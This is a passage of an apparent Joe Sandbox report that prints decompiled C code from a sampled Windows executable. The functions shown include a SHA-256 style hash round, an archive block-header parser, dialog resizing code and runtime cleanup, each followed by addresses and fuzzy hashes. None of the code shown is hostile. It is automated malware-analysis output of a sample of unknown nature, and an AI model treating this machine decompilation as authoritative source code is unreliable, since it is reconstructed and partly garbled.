										_t131 = _t131 - 1;
									} while (_t131 != 0);
									_t76 =  &_v44;
									 *_t76 = _v44 - 1;
								} while ( *_t76 != 0);
								goto L28;
							} else {
								if(_t134 > 1) {
									_t124 =  &_v28;
									_v44 = _t134 - 1;
									do {
										_t132 = 4;
										do {
											_t94 =  *((intOrPtr*)(_t124 - 4));
											 *_t124 =  *_t124 ^ _t94;
											_t124 =  &(_t124[0]);
											_t132 = _t132 - 1;
										} while (_t132 != 0);
										_t50 =  &_v44;
										 *_t50 = _v44 - 1;
									} while ( *_t50 != 0);
								}
								_t131 = 0;
								if(_t134 <= 0) {
									L37:
									_t167 = _t117 - _a4;
								} else {
									L28:
									while(_t117 <= _a4) {
										if(_t131 < _t134) {
											_t139 =  &(( &_v32)[_t131]);
											while(_t126 < 4) {
												_t123 = _t126 + _t117 * 4;
												_t113 =  *_t139;
												_t131 = _t131 + 1;
												_t139 =  &_a4;
												_t126 = _t126 + 1;
												 *(_v48 + 0x18 + _t123 * 4) = _t113;
												_t134 = _v40;
												if(_t131 < _t134) {
													continue;
												}
												break;
											}
										}
										if(_t126 == 4) {
											_t117 = _t117 + 1;
										}
										_t90 = _t126 - 4; // -4
										_t94 =  ~_t90;
										asm("sbb eax, eax");
										_t126 = _t126 & _t94;
										if(_t131 < _t134) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
								}
							}
							L38:
							_t128 = _v36;
						} while (_t167 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t127 < _t134) {
							_t142 =  &(( &_v32)[_t127]);
							while(_t126 < 4) {
								_t125 = _t126 + _t117 * 4;
								_t116 =  *_t142;
								_t127 = _t127 + 1;
								_t142 =  &_a4;
								_t126 = _t126 + 1;
								 *(_v48 + 0x18 + _t125 * 4) = _t116;
								_t134 = _v40;
								if(_t127 < _t134) {
									continue;
								}
								break;
							}
						}
						if(_t126 == 4) {
							_t117 = _t117 + 1;
						}
						_t18 = _t126 - 4; // -4
						_t94 =  ~_t18;
						asm("sbb eax, eax");
						_t126 = _t126 & _t94;
						if(_t127 < _t134) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t94;
			}










































                0x003deff8
                0x003deffb
                0x003df000
                0x003df004
                0x003df009
                0x003df00c
                0x003df00e
                0x003df010
                0x003df014
                0x003df062
                0x003df065
                0x003df06b
                0x003df070
                0x003df079
                0x003df07f
                0x003df08e
                0x003df09d
                0x003df0ac
                0x003df0b2
                0x003df0b5
                0x003df0b9
                0x003df0c0
                0x003df0f3
                0x003df0f7
                0x003df0ff
                0x003df101
                0x003df102
                0x003df105
                0x003df107
                0x003df108
                0x003df108
                0x003df10d
                0x003df10d
                0x003df10d
                0x003df119
                0x003df11d
                0x003df12b
                0x003df13a
                0x003df149
                0x003df158
                0x003df15c
                0x003df15e
                0x003df15f
                0x003df15f
                0x003df162
                0x003df164
                0x003df165
                0x003df165
                0x003df16a
                0x003df16a
                0x003df16a
                0x00000000
                0x003df0c2
                0x003df0c5
                0x003df0ca
                0x003df0ce
                0x003df0d2
                0x003df0d4
                0x003df0d5
                0x003df0d5
                0x003df0d8
                0x003df0da
                0x003df0db
                0x003df0db
                0x003df0e0
                0x003df0e0
                0x003df0e0
                0x003df0d2
                0x003df0e7
                0x003df0eb
                0x003df1b9
                0x003df1b9
                0x003df0f1
                0x00000000
                0x003df171
                0x003df178
                0x003df17e
                0x003df182
                0x003df18b
                0x003df18e
                0x003df191
                0x003df192
                0x003df195
                0x003df196
                0x003df19a
                0x003df1a0
                0x00000000
                0x00000000
                0x00000000
                0x003df1a0
                0x003df1a2
                0x003df1a9
                0x003df1ab
                0x003df1ab
                0x003df1ac
                0x003df1af
                0x003df1b1
                0x003df1b3
                0x003df1b7
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003df1b7
                0x003df171
                0x003df0eb
                0x003df1bc
                0x003df1bc
                0x003df1bc
                0x003df070
                0x00000000
                0x003df016
                0x003df021
                0x003df027
                0x003df02b
                0x003df034
                0x003df037
                0x003df03a
                0x003df03b
                0x003df03e
                0x003df03f
                0x003df043
                0x003df049
                0x00000000
                0x00000000
                0x00000000
                0x003df049
                0x003df04b
                0x003df052
                0x003df054
                0x003df054
                0x003df055
                0x003df058
                0x003df05a
                0x003df05c
                0x003df060
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003df060
                0x003df016
                0x003df1cd
                0x003df1cd

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 072827dcb7ce554ae2a0f80083435d7d9fff70965cf7b92759b5bfee371e7417
                • Instruction ID: cb35d566a8798dc86386640ed1fde1523887dd80b6b6c841cd13728eed76e267
                • Opcode Fuzzy Hash: 072827dcb7ce554ae2a0f80083435d7d9fff70965cf7b92759b5bfee371e7417
                • Instruction Fuzzy Hash: 3351D6325083D58FD712CF35D58046EBFE0AE9A314F4A49AEE5DA5B343C231DA4ACB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E00B7 Relevance: .1, Instructions: 141COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 83%
                			E003E00B7() {
				signed int _t81;
				signed int _t96;
				signed int _t98;
				signed int* _t99;
				unsigned int* _t100;
				void* _t101;
				unsigned int _t103;
				signed int _t108;
				unsigned int _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t149;
				void* _t151;

				_t130 =  *(_t151 + 0x148);
				_t133 = 0;
				_t99 =  &(_t130[0xa]);
				do {
					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E003F68E4( *_t99);
					_t99 =  &(_t99[1]);
					_t133 = _t133 + 1;
				} while (_t133 < 0x10);
				_t100 = _t151 + 0x80;
				_t148 = 0x30;
				do {
					_t103 =  *(_t100 - 0x34);
					_t122 =  *_t100;
					asm("rol esi, 0xe");
					_t100 =  &(_t100[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
					_t148 = _t148 - 1;
				} while (_t148 != 0);
				_t81 =  *_t130;
				_t101 = 0;
				_t108 = _t130[1];
				_t124 = _t130[2];
				_t140 = _t130[5];
				_t149 = _t130[4];
				 *(_t151 + 0x20) = _t81;
				 *(_t151 + 0x2c) = _t81;
				 *(_t151 + 0x28) = _t130[3];
				 *(_t151 + 0x10) = _t130[6];
				_t131 =  *(_t151 + 0x20);
				 *(_t151 + 0x14) = _t108;
				 *(_t151 + 0x18) = _t124;
				 *(_t151 + 0x1c) = _t140;
				 *(_t151 + 0x24) = _t130[7];
				do {
					 *(_t151 + 0x40) =  *(_t151 + 0x10);
					asm("rol eax, 0x7");
					 *(_t151 + 0x3c) = _t140;
					asm("ror esi, 0xb");
					 *(_t151 + 0x30) = _t108;
					 *(_t151 + 0x34) = _t124;
					_t125 =  *(_t151 + 0x1c);
					asm("ror eax, 0x6");
					 *(_t151 + 0x1c) = _t149;
					 *(_t151 + 0x38) = _t149;
					_t40 = _t101 + 0x403b28; // 0x428a2f98
					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
					_t101 = _t101 + 4;
					_t147 = _t146 +  *(_t151 + 0x24);
					 *(_t151 + 0x24) =  *(_t151 + 0x10);
					_t149 =  *(_t151 + 0x28) + _t147;
					 *(_t151 + 0x10) = _t125;
					asm("rol eax, 0xa");
					asm("ror edx, 0xd");
					 *(_t151 + 0x20) = _t131;
					asm("ror eax, 0x2");
					 *(_t151 + 0x28) =  *(_t151 + 0x18);
					_t96 =  *(_t151 + 0x14);
					_t108 = _t131;
					 *(_t151 + 0x18) = _t96;
					 *(_t151 + 0x14) = _t108;
					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
					_t140 =  *(_t151 + 0x1c);
					_t124 = _t96;
				} while (_t101 < 0x100);
				_t98 =  *(_t151 + 0x2c) + _t131;
				_t132 =  *(_t151 + 0x148);
				_t132[1] = _t132[1] + _t108;
				_t132[2] = _t132[2] +  *(_t151 + 0x30);
				_t132[3] = _t132[3] +  *(_t151 + 0x34);
				_t132[5] = _t132[5] +  *(_t151 + 0x38);
				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
				_t132[4] = _t132[4] + _t149;
				_t132[7] = _t132[7] +  *(_t151 + 0x40);
				 *_t132 = _t98;
				return _t98;
			}
























                0x003e00c1
                0x003e00c8
                0x003e00ca
                0x003e00cd
                0x003e00d4
                0x003e00d8
                0x003e00db
                0x003e00dd
                0x003e00e4
                0x003e00eb
                0x003e00ec
                0x003e00ec
                0x003e00f1
                0x003e00f5
                0x003e00f8
                0x003e00fb
                0x003e0109
                0x003e010c
                0x003e011e
                0x003e0121
                0x003e0121
                0x003e0126
                0x003e0128
                0x003e012a
                0x003e012d
                0x003e0130
                0x003e0133
                0x003e0136
                0x003e013a
                0x003e0141
                0x003e0148
                0x003e014f
                0x003e0153
                0x003e0157
                0x003e015b
                0x003e015f
                0x003e0163
                0x003e0167
                0x003e016d
                0x003e0170
                0x003e0176
                0x003e017b
                0x003e017f
                0x003e0185
                0x003e018b
                0x003e0198
                0x003e019e
                0x003e01ae
                0x003e01b4
                0x003e01b8
                0x003e01bb
                0x003e01bf
                0x003e01c3
                0x003e01c5
                0x003e01cb
                0x003e01d0
                0x003e01d5
                0x003e01db
                0x003e01f8
                0x003e01fc
                0x003e0200
                0x003e0202
                0x003e0206
                0x003e020a
                0x003e020d
                0x003e0211
                0x003e0213
                0x003e0223
                0x003e0225
                0x003e022c
                0x003e0233
                0x003e023a
                0x003e0241
                0x003e0248
                0x003e024b
                0x003e0252
                0x003e0255
                0x003e0261

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7cb777eb352f97a0f84b3a71ea9c12f21490c402c36b53100eabb483697b582
                • Instruction ID: c9214f7ebc961fd47c58819c3e33af599faf0773836faa4e214367b4f1d1e5e4
                • Opcode Fuzzy Hash: d7cb777eb352f97a0f84b3a71ea9c12f21490c402c36b53100eabb483697b582
                • Instruction Fuzzy Hash: E051EFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E7340D734EA99CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E3E0B Relevance: .1, Instructions: 112COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E003E3E0B(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E003E4E52(__ecx) != 0) {
					E003DA881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E003DA898(_t88) >> 8;
					E003DA881(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L12;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E003DA898(_t88) >> 8;
					E003DA881(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L8:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L12;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E003DA898(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L8;
				} else {
					L12:
					return 0;
				}
			}


















                0x003e3e11
                0x003e3e15
                0x003e3e18
                0x003e3e1c
                0x003e3e1e
                0x003e3e22
                0x003e3e28
                0x003e3e4f
                0x003e3e62
                0x003e3e66
                0x003e3e6f
                0x003e3e7a
                0x003e3e7b
                0x003e3e82
                0x00000000
                0x00000000
                0x003e3e8f
                0x003e3e92
                0x003e3ea3
                0x003e3ea7
                0x003e3eb0
                0x003e3eeb
                0x003e3eeb
                0x003e3efb
                0x003e3f08
                0x00000000
                0x00000000
                0x003e3f0a
                0x003e3f0c
                0x003e3f0f
                0x003e3f12
                0x003e3f18
                0x003e3f1c
                0x003e3f1e
                0x003e3f1e
                0x003e3f20
                0x003e3f30
                0x003e3f35
                0x00000000
                0x003e3f35
                0x003e3eb2
                0x003e3eb6
                0x003e3eb8
                0x003e3ec4
                0x003e3ec6
                0x003e3ecc
                0x003e3ece
                0x003e3ed9
                0x003e3edb
                0x003e3ede
                0x003e3ede
                0x003e3ee3
                0x003e3ee7
                0x00000000
                0x003e3f3a
                0x003e3f3a
                0x00000000
                0x003e3f3a

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                • Instruction ID: 7b9a61129c464e320a78b8a6dd9f6f649f8efaea77fd77729ef6214f995a5399
                • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                • Instruction Fuzzy Hash: 24313BB2A147568FCB15DF29C85116EBBE0FB95304F10462DE8C5C7381C734EA0ACB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DE2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E003DE2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v0;
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t95;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				signed int _t145;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				void* _t178;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;
				signed int _t221;

				_t178 = __edx;
				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E003D4092( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E003E1DA7( &_v2208,  &_v2288, 0x50);
				_t95 = E003F3E90( &_v2300);
				_t187 = _v8;
				_t155 = 0;
				_v2376 = _t95;
				_t210 =  *0x40e720 - _t155; // 0x64
				if(_t210 <= 0) {
					L8:
					_t156 = E003DD81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t169 - _t179;
					if(_v0 == 0) {
						if(_t156 != 0) {
							_t158 = 0x64;
							asm("cdq");
							_t134 = _v2292 * _v2368.top;
							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
							_v2324 = _t160;
							asm("cdq");
							_t186 = _t134 % _v2352.top;
							_v2352.left = _t134 / _v2352.top + _t205;
							asm("cdq");
							asm("cdq");
							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
							if(_t163 < 0) {
								_t163 = 0;
							}
							if(_t201 < 0) {
								_t201 = 0;
							}
							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
							_t221 = _t145;
							 *0x433150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
							GetWindowRect(_t187,  &_v2368);
							_t156 = _v2393;
						}
						if(E003DD89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
					}
					_t206 = _t205 - GetSystemMetrics(8);
					_t106 = GetWindow(_t187, 5);
					_t188 = _t106;
					_v2368.bottom = _t188;
					if(_t156 == 0) {
						L23:
						return _t106;
					} else {
						_t157 = 0;
						while(_t188 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L23;
							}
							GetWindowRect(_t188,  &_v2320);
							_t170 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x433150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
							_t106 = GetWindow(_t188, 2);
							_t188 = _t106;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L23;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L23;
					}
				} else {
					_t202 = 0x40e274;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0x404788
							_t150 = E003F6740( &_v2288,  *_t9, _t95);
							_t208 = _t208 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t202[1]); // 0x404788
								if(E003DD9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t95 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t155 -  *0x40e720; // 0x64
					} while (_t214 < 0);
					goto L8;
				}
			}























































                0x003de2e8
                0x003de300
                0x003de30a
                0x003de30e
                0x003de313
                0x003de325
                0x003de32f
                0x003de334
                0x003de33b
                0x003de33e
                0x003de342
                0x003de348
                0x003de3a5
                0x003de3bd
                0x003de3c5
                0x003de3c9
                0x003de3d5
                0x003de3e7
                0x003de3ee
                0x003de3f2
                0x003de3f5
                0x003de3fd
                0x003de40b
                0x003de40f
                0x003de417
                0x003de424
                0x003de427
                0x003de430
                0x003de435
                0x003de43b
                0x003de43f
                0x003de440
                0x003de446
                0x003de450
                0x003de457
                0x003de460
                0x003de464
                0x003de468
                0x003de46a
                0x003de46a
                0x003de46e
                0x003de470
                0x003de470
                0x003de483
                0x003de483
                0x003de496
                0x003de4a2
                0x003de4a8
                0x003de4a8
                0x003de4d0
                0x003de4db
                0x003de4db
                0x003de4d0
                0x003de4ec
                0x003de4ee
                0x003de4f4
                0x003de4f6
                0x003de4fc
                0x003de5ae
                0x003de5ae
                0x003de502
                0x003de502
                0x003de59c
                0x003de509
                0x003de50f
                0x00000000
                0x00000000
                0x003de51b
                0x003de525
                0x003de53a
                0x003de53f
                0x003de542
                0x003de558
                0x003de560
                0x003de562
                0x003de563
                0x003de56b
                0x003de57d
                0x003de584
                0x003de58d
                0x003de593
                0x003de595
                0x003de599
                0x00000000
                0x00000000
                0x003de59b
                0x003de59b
                0x003de59b
                0x00000000
                0x003de59c
                0x003de34a
                0x003de34a
                0x003de34f
                0x003de352
                0x003de355
                0x003de35d
                0x003de362
                0x003de367
                0x003de378
                0x003de382
                0x003de38f
                0x003de38f
                0x003de382
                0x003de395
                0x003de395
                0x003de399
                0x003de39a
                0x003de39d
                0x003de39d
                0x00000000
                0x003de34f

                APIs
                • _swprintf.LIBCMT ref: 003DE30E
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                  • Part of subcall function 003E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00411030,?,003DD928,00000000,?,00000050,00411030), ref: 003E1DC4
                • _strlen.LIBCMT ref: 003DE32F
                • SetDlgItemTextW.USER32(?,0040E274,?), ref: 003DE38F
                • GetWindowRect.USER32(?,?), ref: 003DE3C9
                • GetClientRect.USER32(?,?), ref: 003DE3D5
                • GetWindowLongW.USER32(?,000000F0), ref: 003DE475
                • GetWindowRect.USER32(?,?), ref: 003DE4A2
                • SetWindowTextW.USER32(?,?), ref: 003DE4DB
                • GetSystemMetrics.USER32(00000008), ref: 003DE4E3
                • GetWindow.USER32(?,00000005), ref: 003DE4EE
                • GetWindowRect.USER32(00000000,?), ref: 003DE51B
                • GetWindow.USER32(00000000,00000002), ref: 003DE58D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$d$t@
                • API String ID: 2407758923-3100925823
                • Opcode ID: dbf185b77ba1c22aafaa7ded37b7476c5f645ccb697f40aec699a8e48f5671bb
                • Instruction ID: ec7c0ecf92f1d2202c361757270b43e32f07d2f0ca3b012b874f58550fdd4017
                • Opcode Fuzzy Hash: dbf185b77ba1c22aafaa7ded37b7476c5f645ccb697f40aec699a8e48f5671bb
                • Instruction Fuzzy Hash: 9781B272208301AFD711DF68DD89A6FBBE9FB88704F04092EFA84E7250D734E9058B52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FCB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E003FCB22(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x40eea0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E003F8DCC(_t46);
							E003FC701( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E003F8DCC(_t47);
							E003FC7FF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E003F8DCC( *((intOrPtr*)(_t74 + 0x7c)));
						E003F8DCC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E003F8DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E003F8DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E003F8DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E003F8DCC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E003FCC95( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x40e968) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E003F8DCC(_t31);
							E003F8DCC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E003F8DCC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E003F8DCC(_t74);
			}















                0x003fcb2a
                0x003fcb2e
                0x003fcb36
                0x003fcb3f
                0x003fcb44
                0x003fcb4b
                0x003fcb53
                0x003fcb5b
                0x003fcb66
                0x003fcb6c
                0x003fcb6d
                0x003fcb75
                0x003fcb7d
                0x003fcb88
                0x003fcb8e
                0x003fcb92
                0x003fcb9d
                0x003fcba3
                0x003fcb44
                0x003fcba4
